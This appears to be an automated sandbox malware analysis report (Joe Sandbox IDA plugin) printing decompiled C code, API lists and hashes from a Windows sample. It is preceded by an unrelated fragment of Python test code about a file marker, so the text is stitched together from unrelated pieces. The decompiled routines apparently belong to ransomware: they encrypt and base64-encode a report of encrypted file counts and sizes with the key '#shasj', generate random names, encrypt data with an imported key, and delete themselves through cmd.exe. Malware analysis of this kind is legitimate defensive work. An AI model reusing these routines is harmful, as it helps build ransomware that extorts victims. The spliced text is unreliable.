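            fh.write(MARKER + b"\n" + b"CREATE TABLE t (id INT);")
        return scan_directory(d)
```

The fixed offset is the point worth remembering when building test files for this sample: a marker that is not at the very start of the file still passes the presence check, but the bytes handed on are taken from offset 20 and will include part of the marker itself.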

                                        C-Code - Quality: 51%
                                        			E0F9D5670(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8) {
                                        				BYTE* _v8;
                                        				void* _v12;
                                        				void* _v16;
                                        				int _v20;
                                        				char _v22;
                                        				short _v24;
                                        				short _v28;
                                        				char _v36;
                                        				char _v180;
                                        				char _v435;
                                        				char _v436;
                                        				WCHAR* _t40;
                                        				signed int _t48;
                                        				int _t60;
                                        				void* _t61;
                                        				char _t68;
                                        				CHAR* _t71;
                                        				void* _t74;
                                        				short _t79;
                                        				short _t80;
                                        				char _t81;
                                        				BYTE* _t84;
                                        				WCHAR* _t92;
                                        				signed int _t93;
                                        				char* _t95;
                                        				void* _t96;
                                        				int _t98;
                                        				long _t99;
                                        				void* _t100;
                                        
                                        				_t88 = __edx;
                                        				_t74 = __ecx;
                                        				_t96 = __edx;
                                        				_v12 = __ecx;
                                        				_t40 = VirtualAlloc(0, 0x4c02, 0x3000, 0x40);
                                        				_v16 = _t40;
                                        				if(_t40 == 0) {
                                        					_t92 = 0;
                                        					_t71 = 0;
                                        				} else {
                                        					_t3 =  &(_t40[0x400]); // 0x800
                                        					_t71 = _t3;
                                        					_t92 = _t40;
                                        				}
                                        				_push(_t96);
                                        				_v8 = _t92;
                                        				wsprintfW(_t92, L"action=result&e_files=%d&e_size=%I64u&e_time=%d&", _v12, _a4, _a8);
                                        				_push(0);
                                        				_push(_t74);
                                        				_push(0);
                                        				_push(0);
                                        				_push(_t74);
                                        				_push(0);
                                        				_push(_t74);
                                        				_push(0);
                                        				_push(_t74);
                                        				_push(0);
                                        				_push(_t74);
                                        				_push(0);
                                        				_push(0);
                                        				_push(_t74);
                                        				_push(0);
                                        				E0F9D39F0( &_v180);
                                        				E0F9D7330( &_v180, _t88);
                                        				E0F9D7140( &_v180);
                                        				E0F9D6F40( &_v180,  &(_t92[lstrlenW(_t92)]));
                                        				_t48 = lstrlenW(_t92);
                                        				_t79 = "#shasj"; // 0x61687323
                                        				_t93 = _t48;
                                        				asm("movq xmm0, [0xf9dfc78]");
                                        				_v28 = _t79;
                                        				_t80 =  *0xf9dfc84; // 0x6a73
                                        				_v24 = _t80;
                                        				_t81 =  *0xf9dfc86; // 0x0
                                        				asm("movq [ebp-0x20], xmm0");
                                        				_v22 = _t81;
                                        				_v436 = 0;
                                        				E0F9D9010( &_v435, 0, 0xff);
                                        				E0F9D5D70( &_v436,  &_v36, lstrlenA( &_v36));
                                        				_t98 = _t93 + _t93;
                                        				E0F9D5E20( &_v436, _v8, _t98);
                                        				_v20 = _t93 * 8;
                                        				if(CryptBinaryToStringA(_v8, _t98, 0x40000001, _t71,  &_v20) == 0) {
                                        					GetLastError();
                                        				}
                                        				_t29 = lstrlenA(_t71) + 4; // 0x4
                                        				_t99 = _t29;
                                        				_v12 = VirtualAlloc(0, _t99, 0x3000, 0x40);
                                        				_t60 = lstrlenA(_t71);
                                        				_t84 = _v12;
                                        				_t61 = _t60 + 2;
                                        				if(_t84 == 0) {
                                        					L7:
                                        					_v8 = 0;
                                        				} else {
                                        					_v8 = _t84;
                                        					if(_t61 >= _t99) {
                                        						goto L7;
                                        					}
                                        				}
                                        				_t100 = 0;
                                        				if(lstrlenA(_t71) != 0) {
                                        					_t95 = _v8;
                                        					do {
                                        						_t68 =  *((intOrPtr*)(_t100 + _t71));
                                        						if(_t68 != 0xa && _t68 != 0xd) {
                                        							 *_t95 = _t68;
                                        							_t95 = _t95 + 1;
                                        						}
                                        						_t100 = _t100 + 1;
                                        					} while (_t100 < lstrlenA(_t71));
                                        				}
                                        				E0F9D54A0(_v8, 0, 0);
                                        				_t73 =  !=  ? 1 : 0;
                                        				VirtualFree(_v12, 0, 0x8000);
                                        				E0F9D7C10( &_v180);
                                        				VirtualFree(_v16, 0, 0x8000);
                                        				_t67 =  !=  ? 1 : 0;
                                        				return  !=  ? 1 : 0;
                                        			}
                                        Instruction addresses for the listing above: 0x0f9d5670 to 0x0f9d5871

                                        APIs
                                        • VirtualAlloc.KERNEL32(00000000,00004C02,00003000,00000040,?,00000000,?), ref: 0F9D568F
                                        • wsprintfW.USER32 ref: 0F9D56BD
                                        • lstrlenW.KERNEL32(00000000,00000000,?,00000000,00000000,?,00000000), ref: 0F9D570C
                                        • lstrlenW.KERNEL32(00000000,00000000,?,00000000,00000000,?,00000000), ref: 0F9D571E
                                        • _memset.LIBCMT ref: 0F9D5761
                                        • lstrlenA.KERNEL32(00000000,?,?,00000000,00000000,?,00000000), ref: 0F9D576D
                                        • CryptBinaryToStringA.CRYPT32(?,74CB69A0,40000001,00000000,00000000), ref: 0F9D57B2
                                        • GetLastError.KERNEL32(?,?,?,?,00000000,00000000,?,00000000), ref: 0F9D57BC
                                        • lstrlenA.KERNEL32(00000000,?,?,?,?,00000000,00000000,?,00000000), ref: 0F9D57C9
                                        • VirtualAlloc.KERNEL32(00000000,00000004,00003000,00000040,?,?,?,?,00000000,00000000,?,00000000), ref: 0F9D57D8
                                        • lstrlenA.KERNEL32(00000000,?,?,?,?,00000000,00000000,?,00000000), ref: 0F9D57E2
                                        • lstrlenA.KERNEL32(00000000,?,?,?,?,00000000,00000000,?,00000000), ref: 0F9D57FF
                                        • lstrlenA.KERNEL32(00000000,?,?,?,?,00000000,00000000,?,00000000), ref: 0F9D5818
                                        • VirtualFree.KERNEL32(?,00000000,00008000,?,?,?,?,?,00000000,00000000,?,00000000), ref: 0F9D5850
                                        • VirtualFree.KERNEL32(?,00000000,00008000,?,?,?,?,?,00000000,00000000,?,00000000), ref: 0F9D5867
                                        Strings
                                        • #shasj, xrefs: 0F9D5720
                                        • action=result&e_files=%d&e_size=%I64u&e_time=%d&, xrefs: 0F9D56B7
                                        Memory Dump Source
                                        • Source File: 00000014.00000002.325478806.000000000F9D1000.00000020.00000001.01000000.00000005.sdmp, Offset: 0F9D0000, based on PE: true
                                        • Associated: 00000014.00000002.325470957.000000000F9D0000.00000002.00000001.01000000.00000005.sdmp
                                        • Associated: 00000014.00000002.325486891.000000000F9DA000.00000002.00000001.01000000.00000005.sdmp
                                        • Associated: 00000014.00000002.325494839.000000000F9E2000.00000008.00000001.01000000.00000005.sdmp
                                        • Associated: 00000014.00000002.325499771.000000000F9E4000.00000002.00000001.01000000.00000005.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_20_2_f9d0000_isqmkp.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: lstrlen$Virtual$AllocFree$BinaryCryptErrorLastString_memsetwsprintf
                                        • String ID: #shasj$action=result&e_files=%d&e_size=%I64u&e_time=%d&
                                        • API String ID: 2994799111-4131875188
                                        • Opcode ID: b97c54c66967e5881f31c2355ab5d60a25196413129584c32ae6a99e7494c735
                                        • Instruction ID: 4b3846844843bca3adad47a4416aa51267287b95fb9ecbd376b45b9ad7cf64d3
                                        • Opcode Fuzzy Hash: b97c54c66967e5881f31c2355ab5d60a25196413129584c32ae6a99e7494c735
                                        • Instruction Fuzzy Hash: 0F51E171904219ABEB20EBA4DC45FEEBB7DEF44300F644064FA05A71C2EB746A54CBA5
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 73%
                                        			E0F9D5210(CHAR* __ecx, CHAR** __edx) {
                                        				int _v8;
                                        				long _v12;
                                        				char _v14;
                                        				void* _v16;
                                        				void* _v20;
                                        				void* _v24;
                                        				char _v28;
                                        				CHAR** _v32;
                                        				void* _v36;
                                        				char _v291;
                                        				char _v292;
                                        				void* _v348;
                                        				void* _v352;
                                        				int _t43;
                                        				BYTE* _t44;
                                        				int _t46;
                                        				void* _t50;
                                        				void* _t51;
                                        				char _t52;
                                        				void* _t64;
                                        				signed int _t66;
                                        				signed int _t68;
                                        				int _t69;
                                        				int _t72;
                                        				char _t74;
                                        				intOrPtr _t75;
                                        				CHAR* _t84;
                                        				char* _t86;
                                        				void* _t88;
                                        				signed char _t89;
                                        				WCHAR* _t94;
                                        				CHAR* _t95;
                                        				BYTE* _t101;
                                        				WCHAR* _t102;
                                        				WCHAR* _t103;
                                        				void* _t104;
                                        				long _t105;
                                        				long _t106;
                                        				int _t107;
                                        				void* _t108;
                                        				CHAR* _t109;
                                        				void* _t110;
                                        
                                        				_t86 = __ecx;
                                        				_v32 = __edx;
                                        				_t43 = lstrlenA(__ecx) + 1;
                                        				_v8 = _t43;
                                        				_t3 = _t43 + 1; // 0x2
                                        				_t105 = _t3;
                                        				_t44 = VirtualAlloc(0, _t105, 0x3000, 0x40);
                                        				_v36 = _t44;
                                        				if(_t44 == 0 || _v8 >= _t105) {
                                        					_t101 = 0;
                                        					__eflags = 0;
                                        				} else {
                                        					_t101 = _t44;
                                        				}
                                        				_t106 = 0;
                                        				_t46 = CryptStringToBinaryA(_t86, 0, 1, _t101,  &_v8, 0, 0);
                                        				_t119 = _t46;
                                        				if(_t46 == 0) {
                                        					GetLastError();
                                        					goto L14;
                                        				} else {
                                        					_t50 = "#shasj"; // 0x61687323
                                        					asm("movq xmm0, [0xf9dfc78]");
                                        					_t107 = _v8;
                                        					_v20 = _t50;
                                        					_t51 =  *0xf9dfc84; // 0x6a73
                                        					_v16 = _t51;
                                        					_t52 =  *0xf9dfc86; // 0x0
                                        					_v14 = _t52;
                                        					asm("movq [ebp-0x18], xmm0");
                                        					_v292 = 0;
                                        					E0F9D9010( &_v291, 0, 0xff);
                                        					E0F9D5D70( &_v292,  &_v28, lstrlenA( &_v28));
                                        					E0F9D5E20( &_v292, _t101, _t107);
                                        					_t94 =  &_v28;
                                        					asm("xorps xmm0, xmm0");
                                        					asm("movdqu [ebp-0x18], xmm0");
                                        					E0F9D33E0(_t94, _t119, _t101);
                                        					if(_v28 != 0) {
                                        						E0F9D5190();
                                        						asm("int3");
                                        						asm("int3");
                                        						asm("int3");
                                        						asm("int3");
                                        						asm("int3");
                                        						asm("int3");
                                        						asm("int3");
                                        						asm("int3");
                                        						asm("int3");
                                        						asm("int3");
                                        						asm("int3");
                                        						asm("int3");
                                        						asm("int3");
                                        						asm("int3");
                                        						_push(lstrlenA);
                                        						_push(_t107);
                                        						_push(_t101);
                                        						_t102 = _t94;
                                        						_t108 = VirtualAlloc(0, 0x404, 0x3000, 0x40);
                                        						_v352 = _t108;
                                        						GetModuleFileNameW(0, _t108, 0x200);
                                        						_t88 = CreateFileW(_t108, 0x80000000, 1, 0, 3, 0x80, 0);
                                        						_v348 = _t88;
                                        						__eflags = _t88 - 0xffffffff;
                                        						if(_t88 != 0xffffffff) {
                                        							_t64 = CreateFileMappingW(_t88, 0, 8, 0, 0, 0);
                                        							_v28 = _t64;
                                        							__eflags = _t64;
                                        							if(_t64 != 0) {
                                        								_t66 = MapViewOfFile(_t64, 1, 0, 0, 0);
                                        								_v16 = _t66;
                                        								__eflags = _t66;
                                        								if(_t66 != 0) {
                                        									_t29 = _t66 + 0x4e; // 0x4e
                                        									_t109 = _t29;
                                        									_v12 = _t109;
                                        									_t68 = lstrlenW(_t102);
                                        									_t89 = 0;
                                        									_t103 =  &(_t102[_t68]);
                                        									_t69 = lstrlenA(_t109);
                                        									__eflags = _t69 + _t69;
                                        									if(_t69 + _t69 != 0) {
                                        										_t95 = _t109;
                                        										do {
                                        											__eflags = _t89 & 0x00000001;
                                        											if((_t89 & 0x00000001) != 0) {
                                        												 *((char*)(_t103 + _t89)) = 0;
                                        											} else {
                                        												_t74 =  *_t109;
                                        												_t109 =  &(_t109[1]);
                                        												 *((char*)(_t103 + _t89)) = _t74;
                                        											}
                                        											_t89 = _t89 + 1;
                                        											_t72 = lstrlenA(_t95);
                                        											_t95 = _v12;
                                        											__eflags = _t89 - _t72 + _t72;
                                        										} while (_t89 < _t72 + _t72);
                                        									}
                                        									UnmapViewOfFile(_v16);
                                        									_t88 = _v20;
                                        									_t108 = _v24;
                                        								}
                                        								CloseHandle(_v28);
                                        							}
                                        							CloseHandle(_t88);
                                        						}
                                        						return VirtualFree(_t108, 0, 0x8000);
                                        					} else {
                                        						_t104 = _v24;
                                        						_t75 =  *0xf9e2a60; // 0x0
                                        						_t110 = _v20;
                                        						_t76 =  !=  ? 0 : _t75;
                                        						_v12 = 1;
                                        						 *0xf9e2a60 =  !=  ? 0 : _t75;
                                        						if(_t110 != 0) {
                                        							_t84 = VirtualAlloc(0, lstrlenA(_t110) + 1, 0x3000, 4);
                                        							 *_v32 = _t84;
                                        							if(_t84 != 0) {
                                        								lstrcpyA(_t84, _t110);
                                        							}
                                        						}
                                        						_t77 = GetProcessHeap;
                                        						if(_t104 != 0) {
                                        							HeapFree(GetProcessHeap(), 0, _t104);
                                        							_t77 = GetProcessHeap;
                                        						}
                                        						if(_t110 != 0) {
                                        							HeapFree( *_t77(), 0, _t110);
                                        						}
                                        						_t106 = _v12;
                                        						L14:
                                        						VirtualFree(_v36, 0, 0x8000);
                                        						return _t106;
                                        					}
                                        				}
                                        			}

                                        APIs
                                        • lstrlenA.KERNEL32(?,00000001,?,?), ref: 0F9D5222
                                        • VirtualAlloc.KERNEL32(00000000,00000002,00003000,00000040), ref: 0F9D5239
                                        • CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00000000,00000000,00000000), ref: 0F9D525E
                                        • _memset.LIBCMT ref: 0F9D52AB
                                        • lstrlenA.KERNEL32(?), ref: 0F9D52BD
                                        • lstrlenA.KERNEL32(?,00003000,00000004,00000000), ref: 0F9D5324
                                        • VirtualAlloc.KERNEL32(00000000,00000001), ref: 0F9D532A
                                        • lstrcpyA.KERNEL32(00000000,?), ref: 0F9D533B
                                        • HeapFree.KERNEL32(00000000), ref: 0F9D5356
                                        • HeapFree.KERNEL32(00000000), ref: 0F9D5367
                                        • VirtualFree.KERNEL32(?,00000000,00008000), ref: 0F9D5376
                                        • GetLastError.KERNEL32 ref: 0F9D5385
                                          • Part of subcall function 0F9D5190: VirtualAlloc.KERNEL32(00000000,00000400,00003000,00000004,00000000,00000000,0F9D5392,00000000), ref: 0F9D51A6
                                          • Part of subcall function 0F9D5190: VirtualAlloc.KERNEL32(00000000,00000400,00003000,00000004), ref: 0F9D51B8
                                          • Part of subcall function 0F9D5190: GetModuleFileNameW.KERNEL32(00000000,00000000,00000200), ref: 0F9D51C8
                                          • Part of subcall function 0F9D5190: wsprintfW.USER32 ref: 0F9D51D9
                                          • Part of subcall function 0F9D5190: ShellExecuteW.SHELL32(00000000,open,cmd.exe,00000000,00000000,00000000), ref: 0F9D51F3
                                          • Part of subcall function 0F9D5190: ExitProcess.KERNEL32 ref: 0F9D51FB
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000014.00000002.325478806.000000000F9D1000.00000020.00000001.01000000.00000005.sdmp, Offset: 0F9D0000, based on PE: true
• Associated: 00000014.00000002.325470957.000000000F9D0000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000014.00000002.325486891.000000000F9DA000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000014.00000002.325494839.000000000F9E2000.00000008.00000001.01000000.00000005.sdmp
• Associated: 00000014.00000002.325499771.000000000F9E4000.00000002.00000001.01000000.00000005.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_20_2_f9d0000_isqmkp.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Virtual$Alloc$Freelstrlen$Heap$BinaryCryptErrorExecuteExitFileLastModuleNameProcessShellString_memsetlstrcpywsprintf
                                        • String ID: #shasj
                                        • API String ID: 834684195-2423951532
                                        • Opcode ID: cfa8315b72d8639660257b935eb3bcbf1aad53b2cf44e388a7e2ab260f820f3e
                                        • Instruction ID: cd4991fc8194d4aa471413fed75ff32b5195dccf4f5fbfb1cdcb4ee1be2f606e
                                        • Opcode Fuzzy Hash: cfa8315b72d8639660257b935eb3bcbf1aad53b2cf44e388a7e2ab260f820f3e
                                        • Instruction Fuzzy Hash: 5B41F631A05215ABEB209BA4DC44BEFBB7CEF49711F244114F905E3282DB789950CBA0
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 66%
                                        			E0F9D8150(intOrPtr __ecx, void* __edx) {
                                        				long* _v8;
                                        				intOrPtr _v12;
                                        				signed int _v16;
                                        				char _v20;
                                        				intOrPtr _v24;
                                        				intOrPtr _v28;
                                        				char _v32;
                                        				char _v34;
                                        				short _v36;
                                        				intOrPtr _v40;
                                        				intOrPtr _v44;
                                        				char _v48;
                                        				long** _t37;
                                        				struct HINSTANCE__* _t45;
                                        				_Unknown_base(*)()* _t46;
                                        				signed int _t54;
                                        				long _t55;
                                        				intOrPtr _t56;
                                        				signed int _t58;
                                        				signed int _t60;
                                        				void* _t63;
                                        				void* _t64;
                                        				void* _t65;
                                        
                                        				_t54 = 0;
                                        				_v12 = __ecx;
                                        				_t37 =  &_v8;
                                        				_t63 = __edx;
                                        				__imp__CryptAcquireContextW(_t37, 0, 0, 1, 0xf0000000);
                                        				if(_t37 == 0) {
                                        					L15:
                                        					return _t54;
                                        				} else {
                                        					_t58 = 0;
                                        					do {
                                        						_t3 = _t58 + 0x61; // 0x61
                                        						 *((short*)(_t65 + _t58 * 2 - 0x64)) = _t3;
                                        						_t58 = _t58 + 1;
                                        					} while (_t58 < 0x1a);
                                        					_t7 = _t63 + 1; // 0x1
                                        					_t55 = _t7;
                                        					_t64 = VirtualAlloc(0, _t55, 0x3000, 0x40);
                                        					if(_t64 == 0 || _t63 >= _t55) {
                                        						CryptReleaseContext(_v8, 0);
                                        						VirtualFree(_t64, 0, 0x8000);
                                        						return 0;
                                        					} else {
                                        						_v48 = 0x70797243;
                                        						_v44 = 0x6e654774;
                                        						_v40 = 0x646e6152;
                                        						_v36 = 0x6d6f;
                                        						_v34 = 0;
                                        						_v32 = 0x61766441;
                                        						_v28 = 0x32336970;
                                        						_v24 = 0x6c6c642e;
                                        						_v20 = 0;
                                        						_t45 = GetModuleHandleA( &_v32);
                                        						if(_t45 != 0) {
                                        							L7:
                                        							_t19 =  &_v48; // 0x70797243
                                        							_t46 = GetProcAddress(_t45, _t19);
                                        							if(_t46 == 0) {
                                        								goto L13;
                                        							} else {
                                        								_push(_t64);
                                        								_push(_t63);
                                        								_push(_v8);
                                        								if( *_t46() == 0) {
                                        									goto L13;
                                        								} else {
                                        									_t60 = 0;
                                        									if(_t63 != 0) {
                                        										_t56 = _v12;
                                        										_v16 = 0x1a;
                                        										do {
                                        											asm("cdq");
                                        											 *((short*)(_t56 + _t60 * 2)) =  *((intOrPtr*)(_t65 + ( *(_t64 + _t60) & 0x000000ff) % _v16 * 2 - 0x64));
                                        											_t60 = _t60 + 1;
                                        										} while (_t60 < _t63);
                                        									}
                                        									_t54 = 1;
                                        								}
                                        							}
                                        						} else {
                                        							_t18 =  &_v32; // 0x61766441
                                        							_t45 = LoadLibraryA(_t18);
                                        							if(_t45 == 0) {
                                        								L13:
                                        								_t54 = 0;
                                        							} else {
                                        								goto L7;
                                        							}
                                        						}
                                        						CryptReleaseContext(_v8, 0);
                                        						VirtualFree(_t64, 0, 0x8000);
                                        						goto L15;
                                        					}
                                        				}
                                        			}

                                        APIs
                                        • CryptAcquireContextW.ADVAPI32(?,00000000,00000000,00000001,F0000000,00000000,00000000,00000000), ref: 0F9D816D
                                        • VirtualAlloc.KERNEL32(00000000,00000001,00003000,00000040), ref: 0F9D819B
                                        • GetModuleHandleA.KERNEL32(?), ref: 0F9D81EF
                                        • LoadLibraryA.KERNEL32(Advapi32.dll), ref: 0F9D81FD
                                        • GetProcAddress.KERNEL32(00000000,CryptGenRandomAdvapi32.dll), ref: 0F9D820C
                                        • CryptReleaseContext.ADVAPI32(?,00000000), ref: 0F9D8255
                                        • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 0F9D8263
                                        • CryptReleaseContext.ADVAPI32(?,00000000), ref: 0F9D8277
                                        • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 0F9D8285
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000014.00000002.325478806.000000000F9D1000.00000020.00000001.01000000.00000005.sdmp, Offset: 0F9D0000, based on PE: true
                                         • Associated: 00000014.00000002.325470957.000000000F9D0000.00000002.00000001.01000000.00000005.sdmp
                                         • Associated: 00000014.00000002.325486891.000000000F9DA000.00000002.00000001.01000000.00000005.sdmp
                                         • Associated: 00000014.00000002.325494839.000000000F9E2000.00000008.00000001.01000000.00000005.sdmp
                                         • Associated: 00000014.00000002.325499771.000000000F9E4000.00000002.00000001.01000000.00000005.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_20_2_f9d0000_isqmkp.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: ContextCryptVirtual$FreeRelease$AcquireAddressAllocHandleLibraryLoadModuleProc
                                        • String ID: Advapi32.dll$CryptGenRandomAdvapi32.dll
                                        • API String ID: 3996966626-2152921537
                                        • Opcode ID: 217b79c387d5fa74c61f79f8b531a21c3491a706a9592a5d4fc057d931616994
                                        • Instruction ID: da1cbb7ee9285fb786599efd7a496e4bd1b62b50363972ba320919c10a7655e4
                                        • Opcode Fuzzy Hash: 217b79c387d5fa74c61f79f8b531a21c3491a706a9592a5d4fc057d931616994
                                        • Instruction Fuzzy Hash: BC31F874A05209ABEB208FE5DC49BEEBB7CEF05751F308069FA01E6182D7749621CB65
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 75%
                                        			E0F9D82A0(intOrPtr __ecx, intOrPtr __edx) {
                                        				long* _v8;
                                        				intOrPtr _v12;
                                        				intOrPtr _v16;
                                        				char _v20;
                                        				intOrPtr _v24;
                                        				intOrPtr _v28;
                                        				char _v32;
                                        				char _v34;
                                        				short _v36;
                                        				intOrPtr _v40;
                                        				intOrPtr _v44;
                                        				char _v48;
                                        				long** _t25;
                                        				struct HINSTANCE__* _t33;
                                        				_Unknown_base(*)()* _t34;
                                        				long _t40;
                                        				void* _t42;
                                        				void* _t46;
                                        				void* _t47;
                                        				void* _t48;
                                        
                                        				_t46 = 0;
                                        				_v16 = __ecx;
                                        				_t25 =  &_v8;
                                        				_v12 = __edx;
                                        				__imp__CryptAcquireContextW(_t25, 0, 0, 1, 0xf0000000);
                                        				if(_t25 == 0) {
                                        					L10:
                                        					return _t46;
                                        				} else {
                                        					_t42 = 0;
                                        					do {
                                        						_t4 = _t42 + 0x61; // 0x61
                                        						 *((char*)(_t48 + _t42 - 0x38)) = _t4;
                                        						_t42 = _t42 + 1;
                                        					} while (_t42 < 0x1a);
                                        					_t40 = __edx + 1;
                                        					_t47 = VirtualAlloc(0, _t40, 0x3000, 0x40);
                                        					if(_t47 == 0 || _v12 >= _t40) {
                                        						CryptReleaseContext(_v8, 0);
                                        						VirtualFree(_t47, 0, 0x8000);
                                        						return 0;
                                        					} else {
                                        						_v48 = 0x70797243;
                                        						_v44 = 0x6e654774;
                                        						_v40 = 0x646e6152;
                                        						_v36 = 0x6d6f;
                                        						_v34 = 0;
                                        						_v32 = 0x61766441;
                                        						_v28 = 0x32336970;
                                        						_v24 = 0x6c6c642e;
                                        						_v20 = 0;
                                        						_t33 = GetModuleHandleA( &_v32);
                                        						if(_t33 != 0) {
                                        							L7:
                                        							_t19 =  &_v48; // 0x70797243
                                        							_t34 = GetProcAddress(_t33, _t19);
                                        							if(_t34 != 0) {
                                        								 *_t34(_v8, _v12, _v16);
                                        								_t46 =  !=  ? 1 : _t46;
                                        							}
                                        						} else {
                                        							_t18 =  &_v32; // 0x61766441
                                        							_t33 = LoadLibraryA(_t18);
                                        							if(_t33 != 0) {
                                        								goto L7;
                                        							}
                                        						}
                                        						CryptReleaseContext(_v8, 0);
                                        						VirtualFree(_t47, 0, 0x8000);
                                        						goto L10;
                                        					}
                                        				}
                                        			}

                                        APIs
                                        • CryptAcquireContextW.ADVAPI32(?,00000000,00000000,00000001,F0000000,00000000,00000000,00000000), ref: 0F9D82C0
                                        • VirtualAlloc.KERNEL32(00000000,00000007,00003000,00000040), ref: 0F9D82E8
                                        • GetModuleHandleA.KERNEL32(?), ref: 0F9D833D
                                        • LoadLibraryA.KERNEL32(Advapi32.dll), ref: 0F9D834B
                                        • GetProcAddress.KERNEL32(00000000,CryptGenRandomAdvapi32.dll), ref: 0F9D835A
                                        • CryptReleaseContext.ADVAPI32(?,00000000), ref: 0F9D837E
                                        • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 0F9D838C
                                        • CryptReleaseContext.ADVAPI32(?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,0F9D292B), ref: 0F9D83A0
                                        • VirtualFree.KERNEL32(00000000,00000000,00008000,?,?,?,?,?,?,?,?,?,?,?,?,0F9D292B), ref: 0F9D83AE
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000014.00000002.325478806.000000000F9D1000.00000020.00000001.01000000.00000005.sdmp, Offset: 0F9D0000, based on PE: true
                                         • Associated: 00000014.00000002.325470957.000000000F9D0000.00000002.00000001.01000000.00000005.sdmp
                                         • Associated: 00000014.00000002.325486891.000000000F9DA000.00000002.00000001.01000000.00000005.sdmp
                                         • Associated: 00000014.00000002.325494839.000000000F9E2000.00000008.00000001.01000000.00000005.sdmp
                                         • Associated: 00000014.00000002.325499771.000000000F9E4000.00000002.00000001.01000000.00000005.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_20_2_f9d0000_isqmkp.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: ContextCryptVirtual$FreeRelease$AcquireAddressAllocHandleLibraryLoadModuleProc
                                        • String ID: Advapi32.dll$CryptGenRandomAdvapi32.dll
                                        • API String ID: 3996966626-2152921537
                                        • Opcode ID: 1acb6d514d3d6e8ef9ad942e6a13a0f4b5f68ffa94ae3dabd409e1b26e424e1c
                                        • Instruction ID: 210382d2c5051aeefabdf87173a93d34e64520cb74e5883e852665db8d95455a
                                        • Opcode Fuzzy Hash: 1acb6d514d3d6e8ef9ad942e6a13a0f4b5f68ffa94ae3dabd409e1b26e424e1c
                                        • Instruction Fuzzy Hash: 3B31F871A05209AFEB20DFA5DC49BEEBB7CEF05711F204059F605E2182D7789A20CB64
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 54%
                                        			E0F9D6530(BYTE* _a4, int _a8, int _a12, intOrPtr* _a16, intOrPtr _a20) {
                                        				long* _v8;
                                        				long* _v12;
                                        				int _v16;
                                        				char _v20;
                                        				long _v24;
                                        				char _v28;
                                        				intOrPtr _v32;
                                        				long** _t26;
                                        				char* _t31;
                                        				int _t33;
                                        				long _t36;
                                        
                                        				EnterCriticalSection(0xf9e2a48);
                                        				_v8 = 0;
                                        				_v12 = 0;
                                        				_t26 =  &_v8;
                                        				__imp__CryptAcquireContextW(_t26, 0, L"Microsoft Enhanced Cryptographic Provider v1.0", 1, 0);
                                        				if(_t26 != 0) {
                                        					L6:
                                        					_v16 = 0;
                                        					if(CryptImportKey(_v8, _a4, _a8, 0, 0,  &_v12) != 0) {
                                        						_v20 = 0xa;
                                        						_t31 =  &_v20;
                                        						__imp__CryptGetKeyParam(_v12, 8,  &_v28, _t31, 0);
                                        						_v32 = _t31;
                                        						 *_a16 = 0xc8;
                                        						_t33 = _a12;
                                        						__imp__CryptEncrypt(_v12, 0, 1, 0, _t33, _a16, _a20);
                                        						_v16 = _t33;
                                        						_v24 = GetLastError();
                                        						if(_v16 == 0) {
                                        							E0F9D34F0(_t34);
                                        						}
                                        					}
                                        					CryptReleaseContext(_v8, 0);
                                        					LeaveCriticalSection(0xf9e2a48);
                                        					return _v16;
                                        				}
                                        				_t36 = GetLastError();
                                        				if(_t36 != 0x80090016) {
                                        					return 0;
                                        				}
                                        				__imp__CryptAcquireContextW( &_v8, 0, L"Microsoft Enhanced Cryptographic Provider v1.0", 1, 8);
                                        				if(_t36 != 0) {
                                        					goto L6;
                                        				}
                                        				return 0;
                                        			}

                                        APIs
                                        • EnterCriticalSection.KERNEL32(0F9E2A48,?,0F9D3724,00000000,00000000,00000000,?,00000800), ref: 0F9D653B
                                        • CryptAcquireContextW.ADVAPI32(00000000,00000000,Microsoft Enhanced Cryptographic Provider v1.0,00000001,00000000,?,0F9D3724,00000000,00000000,00000000), ref: 0F9D655E
                                        • GetLastError.KERNEL32(?,0F9D3724,00000000,00000000,00000000), ref: 0F9D6568
                                        • CryptAcquireContextW.ADVAPI32(00000000,00000000,Microsoft Enhanced Cryptographic Provider v1.0,00000001,00000008,?,0F9D3724,00000000,00000000,00000000), ref: 0F9D6584
                                        • CryptImportKey.ADVAPI32(00000000,00000000,00000000,00000000,00000000,00000000,?,0F9D3724,00000000,00000000), ref: 0F9D65B9
                                        • CryptGetKeyParam.ADVAPI32(00000000,00000008,0F9D3724,0000000A,00000000,?,0F9D3724,00000000), ref: 0F9D65DA
                                        • CryptEncrypt.ADVAPI32(00000000,00000000,00000001,00000000,0000000A,00000000,0F9D3724,?,0F9D3724,00000000), ref: 0F9D6602
                                        • GetLastError.KERNEL32(?,0F9D3724,00000000), ref: 0F9D660B
                                        • CryptReleaseContext.ADVAPI32(00000000,00000000,?,0F9D3724,00000000,00000000), ref: 0F9D6628
                                        • LeaveCriticalSection.KERNEL32(0F9E2A48,?,0F9D3724,00000000,00000000), ref: 0F9D6633
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000014.00000002.325478806.000000000F9D1000.00000020.00000001.01000000.00000005.sdmp, Offset: 0F9D0000, based on PE: true
                                         • Associated: 00000014.00000002.325470957.000000000F9D0000.00000002.00000001.01000000.00000005.sdmp
